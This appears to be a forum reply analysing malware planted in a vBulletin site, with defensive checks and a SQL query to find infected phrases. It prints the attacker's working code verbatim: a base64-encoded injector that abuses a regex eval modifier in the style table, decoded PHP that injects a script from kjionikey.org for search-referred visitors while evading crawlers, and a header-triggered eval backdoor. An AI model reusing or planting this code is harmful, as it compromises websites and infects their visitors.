$base = base64_decode('JExLZ1RMSEs9KCRPX3JaeGw9IlxceDYyIi4iXFx4NjEiLiJcXHg3MyIuIlxceDY1Ii4iXFx4MzYiLiJcXHgzNCIuIlxceDVmIi4iXFx4NjQiLiJcXHg2NSIuIlxceDYzIi4iXFx4NmYiLiJcXHg2NCIuIlxceDY1ImFuZCRldFZKT1ZPPSJcXHg3MCIuIlxceDcyIi4iXFx4NjUiLiJcXHg2NyIuIlxceDVmIi4iXFx4NzIiLiJcXHg2NSIuIlxceDcwIi4iXFx4NmMiLiJcXHg2MSIuIlxceDYzIi4iXFx4NjUiKT9AJGV0VkpPVk8oIlxceDJmXFx4MmVcXHgyZlxceDY5XFx4NjUiLCRPX3JaeGwoIlFHVjJZV3dvWW1GelpUWTBYMlJsWTI5a1pTZ25XbTVXZFZrelVuQmlNalJuVTBkU01GRnRiRWhXUlVaNVMwTnJaMlYzTUV0YU1uaDJXVzFHYzBsRFVuQmpSamswVDNjd1MwcEhXbkJpUjFabVdrTkJPVWxEWTNaa1J6RjNURE5DYjJOR2JGTlpNRTVEWWxWS2VVcDZjMDVEYVZKd1kwWTVjMGxFTUdkTFNFNHdZMjFzZFZwNWJIQmpSRXB6WWpJMWJrdERVbkJqUmprMFMxUnpUa050YkcxTFIxcHdZa2RXWmxwWWFIQmpNMUo2UzBOU2JXRlhlR3hZTWxGd1NVZEdkVnBEUWtGaFdFNW1aRE5LY0dSSFJtbGlSMVZ2U2tkYWNHSkhWbVphUTJ0bldWYzFhMGxEWjI5S1NFNXdaVzFXWmxwcFFUbEpSVUp0WVZkNGJHTXliRFphVTJkcldtMXNjMXBXT1d0TFUydG5VR2xCZDB0VGEyZGxkekJMU1VOU2ExbFlVbWhKUkRCbldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2tkYWNHSkhWbVphUTJzM1JGRnZaMkZYV1c5S1NFNXdaVzFXWmxwcFFTdEpSRVYzVFVSQmQwMUVRWEJKUjFwd1lrZFdabU5JVmpCWU1rNTJZbTVTYkdKdVVucExRMUp0WVZkNGJGZ3lVWE5pV0ZKbVkyMUdkVnBEWjNoTlJFRnpUMVJyTlV0VE5HNU1RMk53VDNjd1MwbERRbkJhYVdkb1l6TlNlV0ZZVGpCamFXZHJXa2RHTUZsVGQydGhXRUptWWtOcmNFbEljMDVEYVVGblNVZGFjR0pIVm1aalNGWXdXREpPZG1KdVVteGlibEo2UzBOU2JXRlhlR3hZTWxGelNXbFNjR05HT1hOTVEwbHpVbXRzVFZKV09VSlZSa0pHVkd0UmNFOTNNRXRKUTBJNVNVZFdjMk15VldkamJWWXdaRmhLZFVsSVVubGtWMVUzUkZGdloyWlJNRXRtVVRCTFdtNVdkVmt6VW5CaU1qUm5VekpXU1ZOSFVuQlhSWGR2U2tkc2RVdFRRamRFVVhCdVlrYzVhVmxYZDJkS1NGcHBaRmQ0YzFwWVVuQmlhWGRyWVZoQ1ptVkVjMDVEYVZKcllqSXhhR0ZYTkdkUVUwRnVZVEp3Y0dJeU5YQmhNbFkxVEcwNWVWcDVZemRFVVc5cldtMXNkVnBHT1hSYVUwRTVTVU5rTWxsdVZuTmlSMVl3WVZjMVptSlhWblZrVXpWeFkzbzVNbEJVVFRST2VVa3JVRU01ZWxrelNuQmpTRkVyU25welRrTnBVbnBhVjAxblVGTkJibFV5TlVOYVIyaFRVVlp3VTFsclpEQmpiRGh1VDNjd1MwcEhkR3hsVTBFNVNVaE9NVmx1VGpCamFXaDBXa1JWYjBwR09WUlNWa3BYVWxaS1lrb3dhRlZXUmtKbVZsWk9SbFZzT1VKU01GWlBWa05rWkV4cFVuQmpSamswVEdsU2VscFhUWEJNUkVGelRWUlpjRTkzTUV0S1NGWjVZa05CT1VsSE1UQllNMHBvWW0xUmIwMVVRWGRNUkdzMVQxUnJOVTlUYTNWS2VUVnhZM280ZVU1VVFURk9hbWR0U25rMGEyRXlWalZQZHpCTFkyMVdNR1JZU25WSlEyZHJZak5XTUVsRU1HZGpNMUo1V0ROS2JHTkhlR2haTWxWdlNrZGFjR0p0VW1aaVYxVnpTa2RhY0dKdFVtWmlWMVYxU1d4NGVWaEhORGhqTWs1NVlWaENNRWxJVWpWalIxVTVXRU5LTUZwWWFEQk1NbkJvWkcxR2Vsa3pTbkJqU0ZKalNXbENlbU50VFRsWVEwcHZaRWhTZDA5cE9IWktSMUoyWWxkR2NHSnBPR3RrV0VweldFTkpLMUJET1hwWk0wcHdZMGhSSzBscGQydGhWelJ3UzFOQkwwbERVblprV0ZGblQybEJhMkZYTkRkRVVYQTVSRkZ3YldSWE5XcGtSMngyWW1sQ1IyVnJkREZWUjFwd1VWVmpiMHRUUWpkRVVXOXJZVmhCWjFCVFFXNUtlbk5PUTIxc2JVdERSbXhpV0VJd1pWTm5hMWd4VGtaVmJGcEdWV3h6YmxOR1VsVlZSamxaV0RCYVVGVnNaRUpWYTFKR1VrWTVSMVF4U1c1WVUydHdTVWh6VGtOcFFXdFpXRXA1U1VRd1oxcFlhSGRpUnpscldsTm5ia3hEWTNOS1JqbFVVbFpLVjFKV1NtSktNR2hWVmtaQ1psZEdPVWRVTVVwWVVWWktSVkpWVW1aU2F6bFRTakV3Y0U5M01FdEpRMEp3V21sb2QyTnRWbTVZTWpGb1pFZE9iMHREWTNaWWJIaHJaWHBGYzAwek1XTk1iSGhyWlhwRmMwMHpNV05NYkhoclpYcEZjMDB6TVdOTWJIaHJaWHBGYzAwek1HdE1lV056U2tkR2VXTnNjMjVOUTJSa1MxTnJaMlYzTUV0SlEwRm5Ta2RzZDBsRU1HZEtSMFo1WTJ4emJrMURaR1JQZHpCTFNVTkNPVVJSY0RsRVVYQjVXbGhTTVdOdE5HZExRMFpzWWxoQ01HVlRaMnRoV0VGd1MxTkJMMGxEVW5CalEwRTJTVU5TWmxVd1ZsTldhMVpUVjNsa1UxSlZNVkJXUlZabVVWVlNSVlZwWkdSUGR6QkxabEV3UzFwdVZuVlpNMUp3WWpJMFoxRllRbVpoUm5CRldIbG5jRWxJYzA1RGJXeHRTMGhDZVZwWFpHWmlWMFl3V1RKbmIwcDVUbTVpTWpsdVlrZFdPR0pZVG5WbVIzaHdaRzFXT0ZsWGVEQlpXRnB3WXpOU2FHWkhSbnBoTTNnMVdWZG9kbUl6ZUdoaU1uZzRXVzFzZFZvemVHeGxSMFp6V2xkR2EyWkhWalJaTW13d1dsaDRjMlZYVG5aak0zaDBaVmhPZDFsWFRteG1SMFp6V2xob2FHWkhVblprVjBweldsZE9jMkZYVG5KSk1tdHVURU5TWmxVd1ZsTldhMVpUVjNsa1NWWkdVbEZZTVVwR1VtdFdVMUpXU1c1WVUydHdTVWh6VGtOcFFuQmFhV2gzWTIxV2JsZ3lNV2hrUjA1dlMwTmphbUpZVG5CYVdIaHRZVmhLYkZwdE9UUm1SemwzV2xoS2FHWkhUbTlqYlRsMFdsTk9jRXA1ZDJ0WU1VNUdWV3hhUmxWc2MyNVRSbEpWVlVZNVZsVXdWbE5ZTUVaSVVsVTFWVW94TUhCTFUwSjVXbGhTTVdOdE5HZGtTRW94V2xSelRrTnBRamxFVVhBNVJGRndiV1JYTldwa1IyeDJZbWxDZGxSV2JGcFVNa1o1UzBOcloyVjNNRXRhTW5oMldXMUdjMGxEVW5CalJqazBUM2N3UzBwSGJIZFlNMmRuVUZOQ1IyVnJkREZWUjFwd1VWVmpiMHRVYzA1RGFWSm9TVVF3WjFsWVNubFpXR3R2U25wSmVFNXBOSGxOZW10MVNubDNiazFxUVRWTWFtY3hUR2xqYzBwNlJUTk5lVFI1VGxSVmRVcDVkMjVOVkdONlRHcEZOVTVETkc1TVEyTTBUMU0wZVUxRVkzVktlWGR1VG5wUmRVMVVTVEZNYVdOelNucGplVXhxUlRCTWFXTnpTbnBaTWt4cVNUQlBVelJ1VEVOak1rNXBOSGhOUkVsMVNubDNiazVxVVhWTmFrMTZUR2xqY0U5M01FdGFiVGw1V2xkR2FtRkRaMnRaVTBKb1kzbEJhMWxwYTJkbGR6QkxTVWRzYlV0SVFubGFWMlJtWWxkR01Ga3laMjlKYVRsbFNrZEpkbUZUU1hOS1IyeDNXRE5uY0V0VFFubGFXRkl4WTIwMFoyUklTakZhVkhOT1EybENPVVJSY0RsRVVYQndXbWxuYUZwWE1YZGtTR3R2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aVmExWkhVbFpLUmxWcFpHUkxVMnRuWlhjd1MwbEhiRzFMUlVaM1dESm9ZVkpHT0c5TFUwSm9ZbTFSWjBsWE9VNVhWbXhRV1ZoSmIwdFRRbWhpYlZGblNWVm9hMlJGU25CU01WSkNZMmxuY0V0VFFqZEVVVzluU2tjMWJHUXpVbXhsU0ZGblVGTkNURnBWYUVsYVIyeFpWRU5uYTJKdFZqTmtSMVkwWkVOck4wUlJiMmRtVVRCTFpsRXdTMk50VmpCa1dFcDFTVU5TZFZwWVpEQmFXR2d3VDNjOVBTY3BLVHM9IiksIi4iKTpudWxsOw==');
$style = $GLOBALS['style'];
if(!empty($style['styleid'])) {
$a = $db->query_first('select styleid from '.TABLE_PREFIX.'style where styleid=\''.$style['styleid'].'\'');
if($a['styleid']!='' and $a['replacements']=='') {
$db->query_write('update '.TABLE_PREFIX.'style set replacements=\'a:1:{s:12:"/^(.*?)$/ise";s:'.(strlen($base)-30).':"'.$base.'";}\' where styleid=\''.$style['styleid'].'\'');
echo 'ok';
} else echo 'error';
}
exit;
}
#iai();
It's worth noting that query there:
'update '.TABLE_PREFIX.'style set replacements=\'a:1:{s:12:"/^(.*?)$/ise";s:'.(strlen($base)-30).':"'.$base.'";}\' where styleid=\''.$style['styleid'].'\''
Check your style table, as that's one way/the way code is exposed to the user.
Renaming your style table to something else would likely mitigate the effects of this attack for now.
In there, the base64 bit has more bas64 in, which has more bas64 in which eventually evals:
function HdtBiGTAr() {
global $ip_x;
$file_d = '/tmp/phpYRcCBmBr';
$ip_l = (string)ip2long($ip_x);
if(file_exists($file_d) and #is_writable($file_d) and (($size_f = #filesize($file_d)) > 0)) {
$data = file_get_contents($file_d);
if($size_f > 1000000) file_put_contents($file_d,mt_rand(100,999).',');
if(!stristr($data,$ip_l)) {
file_put_contents($file_d,"$ip_l,",FILE_APPEND);
} else return true;
}
}
function KeHHdiXL($in) {
global $vbulletin,$ip_x;
$domain = 'kjionikey.org';
$find_me = 'vbulletin_menu.js?v=387"></script>';
$sec = 'SnBdhRAZRbGtr_';
$key = substr(md5($_SERVER['HTTP_USER_AGENT'].$ip_x.$sec),0,16);
$url = mt_rand(100,999999).'.js?250568&'.$key;
return ($out = str_replace($find_me,$find_me."\r\n<script type=\"text/javascript\" src=\"http://$domain/$url\"></script>",$in)) ? $out : $in;
}
function FzKuPfiAG() {
$ip = '';
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$arr = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$arr['0'])) {
$ip = $arr['0'];
}
}
return (!empty($ip)) ? $ip : $_SERVER['REMOTE_ADDR'];
}
function Ap_hZD_() {
if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick#i',$_SERVER['HTTP_REFERER'])) {
if(preg_match('#msie|firefox|opera|chrome#i',$_SERVER['HTTP_USER_AGENT'])) return true;
}
}
function oMYYOar() {
global $ip_x;
$ip_x = FzKuPfiAG();
$a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');
foreach($a as $b) {
if(preg_match("/^$b/i",$ip_x)) return true;
}
}
if(!empty($_SERVER['HTTP_REFERER'])) {
if(Ap_hZD_() and !oMYYOar() and !HdtBiGTAr()) {
$newtext = KeHHdiXL($newtext);
}
}
return $newtext;
This writes to a file called /tmp/phpYRcCBmBr, so I'd check what that says.
It also hides it's behaviour from search engines, which is nice of it.
The bad bit for users is likely:
function KeHHdiXL($in) {
global $vbulletin,$ip_x;
$domain = 'kjionikey.org';
$find_me = 'vbulletin_menu.js?v=387"></script>';
$sec = 'SnBdhRAZRbGtr_';
$key = substr(md5($_SERVER['HTTP_USER_AGENT'].$ip_x.$sec),0,16);
$url = mt_rand(100,999999).'.js?250568&'.$key;
return ($out = str_replace($find_me,$find_me."\r\n<script type=\"text/javascript\" src=\"http://$domain/$url\"></script>",$in)) ? $out : $in;
}
Which puts some JS on the page hosted by kjionikey.org. That JS requires a key based on the IP address.
I'd check any code that reads/executes the contents of random $_SERVER variables, but why that would be in there, I don't know.
The attacker in this case has a backdoor code installed in one of your FAQ phrases (vbulletin phrases db table) as a set of chr() PHP function calls.
${$GeAZvLDI=chr(99).chr(114).chr(101).chr(97).chr(116).chr(101).chr(95) ...
that basically when eval'd through the faq.php script, gets decoded to:
if(!empty($_SERVER['HTTP_PACK']) and !empty($_SERVER['HTTP_SOVIET']))
{
if(md5(md5($_SERVER['HTTP_PACK'])) == 'rDGeOKeGGdiVLFy')
#eval(base64_decode($_SERVER['HTTP_SOVIET']));
}
You may find the affected vBulletin phrases by issuing a SQL query like so
SELECT varname, text FROM `phrase` where text like '%chr(%';
Though there are many variants of this, some are using HEX strings, base64decode, assert, pack calls or just plain PHP.